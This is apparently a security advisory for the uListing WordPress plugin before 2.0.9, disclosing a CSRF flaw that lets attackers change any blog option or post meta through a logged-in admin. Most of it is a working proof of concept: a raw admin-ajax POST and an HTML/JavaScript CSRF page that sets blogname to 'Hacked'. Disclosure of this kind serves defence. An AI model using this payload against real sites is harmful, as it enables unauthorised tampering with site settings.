uListing < 2.0.9 – Arbitrary Blog Option Update via CSRF

Description

The plugin does not have CSRF check in the uListing_import_layout function, nor perform any validation on the option/post meta key to update to ensure it belongs to the plugin. As a result, attackers could make a logged in admin change any of the blog option (such as siteurl, blogname etc) as well as post meta to arbitrary values.

Proof of Concept

This will update the blogname option to Hacked.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------425604886635129992692405644198
Content-Length: 713
Connection: close
Cookie: [admin via CSRF]

-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="file"; filename="hello.txt"
Content-Type: text/plain

Hacked
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="nonce"

dummy
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="type"

inventory
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="action"

uListing_import_single
-----------------------------425604886635129992692405644198
Content-Disposition: form-data; name="id"

blogname
-----------------------------425604886635129992692405644198--

CSRF:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin-ajax.php", true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------425604886635129992692405644198");
        xhr.withCredentials = true;
        var body = "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"hello.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "Hacked\n" + 
          "\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"nonce\"\r\n" + 
          "\r\n" + 
          "dummy\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"type\"\r\n" + 
          "\r\n" + 
          "inventory\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"action\"\r\n" + 
          "\r\n" + 
          "uListing_import_single\r\n" + 
          "-----------------------------425604886635129992692405644198\r\n" + 
          "Content-Disposition: form-data; name=\"id\"\r\n" + 
          "\r\n" + 
          "blogname\r\n" + 
          "-----------------------------425604886635129992692405644198--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>